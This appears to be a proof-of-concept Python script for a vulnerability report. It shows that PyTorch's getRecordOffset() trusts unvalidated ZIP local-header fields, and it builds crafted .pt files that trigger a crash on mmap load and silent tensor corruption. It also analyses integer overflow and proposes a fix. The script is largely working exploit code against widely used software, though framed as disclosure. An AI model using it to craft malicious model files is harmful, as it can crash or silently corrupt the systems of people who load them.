| | |
| | """ |
| | PoC: getRecordOffset() Integer Overflow via Local Header Manipulation |
| | |
| | Vulnerability: PyTorchStreamReader::getRecordOffset() at inline_container.cc:634-637 |
| | reads `filename_len` and `extra_len` directly from the ZIP local file header (LFH) |
| | without validating them against the central directory. The returned offset is: |
| | |
| | return stat.m_local_header_ofs + MZ_ZIP_LOCAL_DIR_HEADER_SIZE |
| | + filename_len + extra_len; |
| | |
| | A crafted .pt file where the LFH has modified filename_len/extra_len causes |
| | getRecordOffset() to return a WRONG offset. This offset is then used by: |
| | |
1. torch.load(path, mmap=True) → indexes into mmap'd buffer at wrong position
| | (serialization.py:2083-2084) |
2. getRecordMultiReaders() → multi-threaded reading from wrong offset
| | (inline_container.cc:398-424) |
| | 3. Any caller of get_record_offset() Python API |
| | |
| | Additionally, on 32-bit platforms (PyTorch Mobile ARM32), stat.m_local_header_ofs |
| | is mz_uint64 (64-bit) but the return type is size_t (32-bit), causing silent |
| | truncation that wraps the offset to a completely different file position. |
| | |
| | The ZIP central directory is NOT modified, so miniz validation passes. |
| | |
Root cause: inline_container.cc:634-637 → no validation of LFH fields
| | Tested: PyTorch 2.10.0+cpu on Python 3.13.11 |
| | """ |
| |
|
| | import ctypes |
| | import io |
| | import os |
| | import struct |
| | import subprocess |
| | import sys |
| | import tempfile |
| | import warnings |
| |
|
| | import torch |
| | import torch.nn as nn |
| |
|
# Silence all warnings so the PoC's console output stays readable.
warnings.filterwarnings('ignore')
| |
|
| |
|
def create_test_model(output_path):
    """Save a 2x2 float32 tensor with known values to *output_path*.

    The fixed values [[1, 2], [3, 4]] make it easy to spot later whether
    a load returned the correct bytes.  Returns *output_path* for chaining.
    """
    tensor = torch.tensor([[1.0, 2.0], [3.0, 4.0]], dtype=torch.float32)
    torch.save(tensor, output_path)
    return output_path
| |
|
| |
|
def find_local_header(data, record_name_suffix):
    """Locate a ZIP local file header whose stored filename ends with
    *record_name_suffix*.

    Scans *data* for the LFH signature b'PK\\x03\\x04' and decodes the
    16-bit filename/extra-field lengths at fixed offsets 26 and 28 of the
    30-byte header.  Returns a dict with the header offset, both lengths,
    the decoded filename, and the computed payload offset — or None when
    no matching header exists.
    """
    signature = b'PK\x03\x04'
    search_from = 0
    while search_from < len(data):
        hdr = data.find(signature, search_from)
        if hdr < 0:
            return None
        name_len = struct.unpack_from('<H', data, hdr + 26)[0]
        name = data[hdr + 30:hdr + 30 + name_len].decode('utf-8', errors='replace')
        if name.endswith(record_name_suffix):
            xtra_len = struct.unpack_from('<H', data, hdr + 28)[0]
            return {
                'offset': hdr,
                'fn_len': name_len,
                'extra_len': xtra_len,
                'filename': name,
                # Payload starts right after the fixed header + name + extra.
                'data_offset': hdr + 30 + name_len + xtra_len,
            }
        search_from = hdr + 1
    return None
| |
|
| |
|
def create_modified_model(input_path, output_path, new_extra_len):
    """Copy *input_path* to *output_path* with the data/0 local header's
    extra_len field overwritten by *new_extra_len*.

    Only the local file header is patched — the central directory stays
    intact, so ZIP-level validation still passes.  Returns a tuple of
    (header info as parsed BEFORE patching, original extra_len, file size).

    Raises ValueError when no data/0 local header can be found.
    """
    with open(input_path, 'rb') as src:
        blob = bytearray(src.read())

    header = find_local_header(blob, 'data/0')
    if not header:
        raise ValueError("data/0 local header not found")

    previous_extra = header['extra_len']
    # extra_len lives 28 bytes into the 30-byte local file header.
    struct.pack_into('<H', blob, header['offset'] + 28, new_extra_len)

    with open(output_path, 'wb') as dst:
        dst.write(blob)

    return header, previous_extra, len(blob)
| |
|
| |
|
def run_in_subprocess(script, timeout=15):
    """Execute *script* with the current interpreter in a child process.

    Returns (returncode, stripped stdout, stripped stderr).  Propagates
    subprocess.TimeoutExpired when the child outlives *timeout* seconds.
    """
    proc = subprocess.run(
        [sys.executable, '-c', script],
        capture_output=True,
        text=True,
        timeout=timeout,
    )
    return proc.returncode, proc.stdout.strip(), proc.stderr.strip()
| |
|
| |
|
def get_signal_name(signum):
    """Return the symbolic name for *signum* (e.g. 9 -> 'SIGKILL').

    Falls back to the literal string 'signal <n>' when the number does not
    correspond to a signal known on this platform.
    """
    try:
        import signal
        return signal.Signals(signum).name
    except (ValueError, AttributeError):
        return f"signal {signum}"
| |
|
| |
|
def demonstrate_wrong_offset():
    """Part 1: Show getRecordOffset returns wrong value from crafted local header.

    Builds a pristine .pt archive, records PyTorch's reported offset for the
    data/0 record, then forges the local header's extra_len to 65535 and
    shows the reported offset now points far past EOF.  Returns the path to
    the pristine archive and the temp dir, reused by the later demo parts.
    """
    print()
    print("=" * 70)
    print(" Part 1: getRecordOffset() Returns Wrong Offset")
    print("=" * 70)
    print()

    # Build a pristine .pt archive so the true record layout is known.
    tmpdir = tempfile.mkdtemp(prefix="recoff_")
    valid_path = os.path.join(tmpdir, "valid.pt")
    create_test_model(valid_path)

    with open(valid_path, 'rb') as f:
        data = f.read()

    # Parse the data/0 local file header straight from the bytes on disk.
    lh = find_local_header(data, 'data/0')
    print(f" File size: {len(data)} bytes")
    print(f" data/0 local header at offset {lh['offset']}")
    print(f" data/0 filename_len: {lh['fn_len']}")
    print(f" data/0 extra_len: {lh['extra_len']}")
    print(f" data/0 correct data offset: {lh['data_offset']}")
    print()

    # Baseline: offset reported by PyTorch for the untouched archive.
    # NOTE: torch._C.PyTorchFileReader is a private API — may change.
    reader = torch._C.PyTorchFileReader(valid_path)
    orig_off = reader.get_record_offset("data/0")
    print(f" get_record_offset('data/0') [original]: {orig_off}")
    print()

    # Forge only the LFH extra_len to the 16-bit maximum (65535).
    mod_path = os.path.join(tmpdir, "modified_65535.pt")
    lh_info, orig_extra, file_size = create_modified_model(
        valid_path, mod_path, 65535
    )

    # Mirrors the vulnerable formula: LFH offset + 30-byte header
    # + filename_len + extra_len — so the forged value should push the
    # reported offset well past the end of the file.
    expected_wrong = lh['offset'] + 30 + lh['fn_len'] + 65535
    reader2 = torch._C.PyTorchFileReader(mod_path)
    wrong_off = reader2.get_record_offset("data/0")

    print(f" After setting extra_len: {orig_extra} β 65535")
    print(f" get_record_offset('data/0') [modified]: {wrong_off}")
    print(f" Expected wrong offset: {expected_wrong}")
    print(f" File size: {file_size}")
    print(f" Offset past EOF by: {wrong_off - file_size} bytes")
    print()

    # Show what actually lives at the CORRECT offset, for contrast.
    print(" Correct offset data (first 16 bytes of tensor):")
    correct_data = data[lh['data_offset']:lh['data_offset'] + 16]
    hex_str = ' '.join(f'{b:02x}' for b in correct_data)
    floats = struct.unpack_from('<4f', correct_data)
    print(f" {hex_str}")
    print(f" = [{', '.join(f'{v:.1f}' for v in floats)}] (correct tensor values)")
    print()

    print(" Wrong offset ({}) is {} bytes PAST the file end.".format(
        wrong_off, wrong_off - file_size))
    print(" Any read at this offset accesses invalid memory or fails.")
    print()
    print(" [+] getRecordOffset() trusts unvalidated local header fields!")
    print(" [+] Central directory is untouched β miniz validation passes!")

    # Hand the pristine file and temp dir to the later demo parts.
    return valid_path, tmpdir
| |
|
| |
|
def demonstrate_mmap_impact(valid_path, tmpdir):
    """Part 2: Show torch.load(mmap=True) fails due to wrong offset.

    Loads both the pristine and the forged archive in child processes
    (the forged one could crash the interpreter, so it must not run in
    this process) and prints the outcome of each load.
    """
    print()
    print("=" * 70)
    print(" Part 2: Impact on torch.load(mmap=True)")
    print("=" * 70)
    print()

    # Forge the LFH extra_len so the reported offset lands far past EOF.
    mod_path = os.path.join(tmpdir, "mmap_test.pt")
    create_modified_model(valid_path, mod_path, 65535)

    # Control case: the untouched archive loads fine under mmap.
    script_valid = f'''\
import torch, warnings
warnings.filterwarnings("ignore")
t = torch.load("{valid_path}", mmap=True, weights_only=True)
print(f"VALID: shape={{t.shape}} values={{t.tolist()}}")
'''
    rc, stdout, stderr = run_in_subprocess(script_valid)
    print(f" Valid file mmap load: {stdout}")

    # The forged archive: catch Python-level errors inside the child and
    # detect a hard crash (negative returncode = killed by signal) here.
    script_mod = f'''\
import torch, warnings
warnings.filterwarnings("ignore")
try:
    t = torch.load("{mod_path}", mmap=True, weights_only=True)
    print(f"LOADED: shape={{t.shape}} values={{t.tolist()}}")
except RuntimeError as e:
    print(f"RUNTIME_ERROR: {{str(e)[:200]}}")
except Exception as e:
    print(f"ERROR: {{type(e).__name__}}: {{str(e)[:200]}}")
'''
    rc, stdout, stderr = run_in_subprocess(script_mod)
    if rc < 0:
        # Negative returncode means the child was terminated by a signal.
        print(f" Modified file mmap load: CRASH ({get_signal_name(-rc)})")
    else:
        print(f" Modified file mmap load: {stdout}")

    print()
    print(" torch.load(mmap=True) uses get_record_offset() to index into the")
    print(" mmap'd buffer (serialization.py:2083-2084):")
    print(" storage_offset = zip_file.get_record_offset(name)")
    print(" storage = overall_storage[storage_offset : storage_offset + nbytes]")
    print(" With the wrong offset, this reads from the wrong position or fails.")
| |
|
| |
|
def demonstrate_within_file_corruption(valid_path, tmpdir):
    """Part 3: Show offset within file reads WRONG data (silent corruption).

    Instead of pushing the offset past EOF, shift data/0's computed offset
    so it lands exactly on ANOTHER record's payload inside the same file —
    a read then succeeds but silently returns the wrong bytes.
    """
    print()
    print("=" * 70)
    print(" Part 3: Within-File Offset β Silent Data Corruption")
    print("=" * 70)
    print()

    with open(valid_path, 'rb') as f:
        data = bytearray(f.read())

    lh = find_local_header(data, 'data/0')
    correct_off = lh['data_offset']

    # Scan for the first record AFTER data/0's payload that is not itself
    # a data/0 header — its payload becomes the landing target.
    target_lh = None
    pos = 0
    while pos < len(data):
        idx = data.find(b'PK\x03\x04', pos)
        if idx == -1:
            break
        fn_len_t = struct.unpack_from('<H', data, idx + 26)[0]
        extra_len_t = struct.unpack_from('<H', data, idx + 28)[0]
        fn = data[idx + 30:idx + 30 + fn_len_t].decode('utf-8', errors='replace')
        t_data_off = idx + 30 + fn_len_t + extra_len_t
        if t_data_off > correct_off and 'data/0' not in fn:
            target_lh = {'offset': idx, 'data_offset': t_data_off, 'filename': fn}
            break
        pos = idx + 1

    if not target_lh:
        print(" Skipped: no suitable target record found after data/0")
        return

    # extra_len delta that makes data/0's computed offset land exactly on
    # the target record's payload; must still fit in the 16-bit field.
    target_off = target_lh['data_offset']
    needed_shift = target_off - correct_off
    new_extra = lh['extra_len'] + needed_shift

    if new_extra > 65535 or new_extra < 0:
        print(f" Skipped: needed extra_len={new_extra} out of 16-bit range")
        return

    print(f" Original data/0 offset: {correct_off} (tensor data)")
    print(f" Target: '{target_lh['filename']}' data at offset {target_off}")
    print(f" Shifting by {needed_shift}: extra_len {lh['extra_len']} β {new_extra}")
    print()

    # Show the raw bytes at both offsets before patching anything.
    correct_bytes = data[correct_off:correct_off + 16]
    target_bytes = data[target_off:target_off + 16]
    print(f" Correct offset ({correct_off}) bytes: "
          + ' '.join(f'{b:02x}' for b in correct_bytes))
    print(f" Target offset ({target_off}) bytes: "
          + ' '.join(f'{b:02x}' for b in target_bytes))
    print(f" Target data as text: {bytes(target_bytes).decode('utf-8', errors='replace')!r}")
    print()

    # Patch only the LFH extra_len and write the forged archive.
    mod_path = os.path.join(tmpdir, "corruption.pt")
    struct.pack_into('<H', data, lh['offset'] + 28, new_extra)
    with open(mod_path, 'wb') as f:
        f.write(data)

    # PyTorch now reports the shifted (wrong) offset for data/0.
    # NOTE: torch._C.PyTorchFileReader is a private API — may change.
    reader = torch._C.PyTorchFileReader(mod_path)
    new_off = reader.get_record_offset('data/0')
    print(f" get_record_offset('data/0'): {new_off}")
    print(f" This points to '{target_lh['filename']}' record data!")
    print(f" If used, tensor data would be read from the wrong record.")
    print()

    # Interpret the bytes at the wrong offset as float32 to make the
    # silent corruption visible.
    print(" Reading data at wrong offset as float32 tensor:")
    wrong_floats = struct.unpack_from('<4f', data, target_off)
    correct_floats = struct.unpack_from('<4f', data, correct_off)
    print(f" Expected: [{', '.join(f'{v:.1f}' for v in correct_floats)}]")
    print(f" Got: [{', '.join(f'{v:.6g}' for v in wrong_floats)}] (garbage!)")
    print()
    print(" [+] Data/0 now reads from wrong record β silent tensor corruption!")
| |
|
| |
|
def demonstrate_overflow_analysis():
    """Part 4: Show integer overflow on 32-bit and 64-bit platforms.

    Pure arithmetic demonstration: emulates the unsigned wrap-around of
    the vulnerable C++ expression on both 32-bit and 64-bit size_t.
    """
    mask64 = (1 << 64) - 1  # emulates uint64_t wrap-around
    mask32 = (1 << 32) - 1  # emulates 32-bit size_t truncation

    print()
    print("=" * 70)
    print(" Part 4: Integer Overflow Analysis")
    print("=" * 70)
    print()

    print(" Vulnerable code (inline_container.cc:634-637):")
    print()
    print(" size_t filename_len = read_le_16(local_header + 26);")
    print(" size_t extra_len = read_le_16(local_header + 28);")
    print(" return stat.m_local_header_ofs + 30 + filename_len + extra_len;")
    print()
    print(" Types: m_local_header_ofs is mz_uint64 (uint64_t)")
    print(" Return type is size_t (32-bit on ARM32, 64-bit on x86_64)")
    print()

    print(" 32-bit platform (PyTorch Mobile ARM32):")
    print(" βββββββββββββββββββββββββββββββββββββββββββββββββ")
    # (header offset, fixed header size, filename_len, extra_len, note)
    scenarios_32bit = [
        (0x00000100, 30, 100, 200, "normal β within 32-bit range"),
        (0xFFFFFFA0, 30, 0, 0, "near 32-bit max β wraps on 32-bit"),
        (0x100000000, 30, 100, 200, "above 32-bit β truncated to low 32 bits"),
        (0x100000100, 30, 100, 200, "4GB+offset β wraps to small value"),
    ]

    print(f" {'m_local_header_ofs':>22s} {'+ 30 + fn + ex':>14s} {'64-bit result':>18s} {'32-bit (truncated)':>18s} Notes")
    print(f" {'β'*22} {'β'*14} {'β'*18} {'β'*18} {'β'*30}")

    for base, hdr, fnl, xtra, note in scenarios_32bit:
        added = hdr + fnl + xtra
        as64 = (base + added) & mask64
        as32 = as64 & mask32
        flag = "no" if as32 == as64 else "YES!"
        print(f" 0x{base:016X} + {added:12d} 0x{as64:016X} 0x{as32:08X} ({flag:4s}) {note}")

    print()
    print(" On 32-bit ARM: mz_uint64 β size_t truncation loses high 32 bits")
    print(" Offset 0x100000100 + extras β 0x100000230 β truncated to 0x00000230")
    print(" The 4GB worth of offset data is silently lost!")
    print()

    print(" 64-bit overflow (requires m_local_header_ofs near UINT64_MAX):")
    print(" βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ")
    scenarios_64bit = [
        (0xFFFFFFFFFFFF0000, 30, 65535, 65535, "wraps to 0x20FFD"),
        (0xFFFFFFFFFFFFFFF0, 30, 0, 0, "wraps to 0x0E"),
        (0xFFFFFFFFFFFFF000, 30, 50000, 15505, "wraps to 0xFFFF"),
    ]

    for base, hdr, fnl, xtra, note in scenarios_64bit:
        wrapped = (base + hdr + fnl + xtra) & mask64
        print(f" 0x{base:016X} + {hdr+fnl+xtra:6d} β 0x{wrapped:016X} {note}")

    print()
    print(" 64-bit overflow wraps huge offset to a small value near 0")
    print(" File data at offset 0 is the ZIP local header, not tensor data")
    print(" β reads ZIP metadata as tensor values β corruption or crash")
| |
|
| |
|
def demonstrate_vulnerability_code():
    """Part 5: Print the root-cause analysis, affected callers, and the fix.

    Purely informational — emits a fixed block of text describing the
    vulnerability and the proposed C++ patch.
    """
    banner = "=" * 70
    # Data-driven: one entry per output line, printed in order.
    report = (
        "",
        banner,
        " Part 5: Vulnerability Details",
        banner,
        "",
        " ROOT CAUSE: getRecordOffset() reads filename_len and extra_len",
        " from the local file header WITHOUT cross-checking against the",
        " central directory values that miniz validated.",
        "",
        " The central directory is validated by miniz during ZIP open.",
        " But the LOCAL header is read separately by getRecordOffset().",
        " An attacker can have different values in LFH vs central directory.",
        "",
        " CALLERS that use the wrong offset:",
        " 1. torch.load(mmap=True): serialization.py:2083",
        " storage_offset = zip_file.get_record_offset(name)",
        " storage = overall_storage[storage_offset:storage_offset+n]",
        " 2. getRecordMultiReaders(): inline_container.cc:398",
        " size_t recordOff = getRecordOffset(name);",
        " read(recordOff + startPos, dst + startPos, size);",
        " 3. Any caller of get_record_offset() Python/C++ API",
        "",
        " FIX: Validate LFH fields against central directory:",
        " βββββββββββββββββββββββββββββββββββββββββββββββββββββ",
        " size_t filename_len = read_le_16(local_header + 26);",
        " size_t extra_len = read_le_16(local_header + 28);",
        " TORCH_CHECK(",
        " !__builtin_add_overflow(stat.m_local_header_ofs,",
        " MZ_ZIP_LOCAL_DIR_HEADER_SIZE + filename_len + extra_len,",
        " &result),",
        ' "Record offset overflow for ", name);',
        " TORCH_CHECK(result <= file_size_,",
        ' "Record offset exceeds file size for ", name);',
    )
    for line in report:
        print(line)
| |
|
| |
|
def main():
    """Drive the PoC: run Parts 1-5 in order, then print the summary."""
    print()
    print(" PoC: getRecordOffset() Integer Overflow via Local Header")
    print(f" PyTorch {torch.__version__}, Python {sys.version.split()[0]}")
    print()

    # Part 1 creates the archives that Parts 2 and 3 reuse.
    valid_path, tmpdir = demonstrate_wrong_offset()
    demonstrate_mmap_impact(valid_path, tmpdir)
    demonstrate_within_file_corruption(valid_path, tmpdir)
    demonstrate_overflow_analysis()
    demonstrate_vulnerability_code()

    print()
    print("=" * 70)
    for line in (
        " RESULTS:",
        " [+] getRecordOffset() returns wrong offset from crafted LFH",
        " [+] Modified extra_len: offset jumps 65KB past EOF (65535 vs 63)",
        " [+] torch.load(mmap=True) fails on wrong offset β DoS",
        " [+] Within-file offset shift β silent tensor data corruption",
        " [+] 32-bit: mz_uint64βsize_t truncation wraps offset",
        " [+] 64-bit: addition overflow wraps near-max offset to ~0",
        " [+] Fix: validate LFH against CD, check overflow, check bounds",
    ):
        print(line)
    print("=" * 70)
| |
|
| |
|
if __name__ == "__main__":
    # Entry-point guard: allows importing this PoC without running it.
    main()
| |
|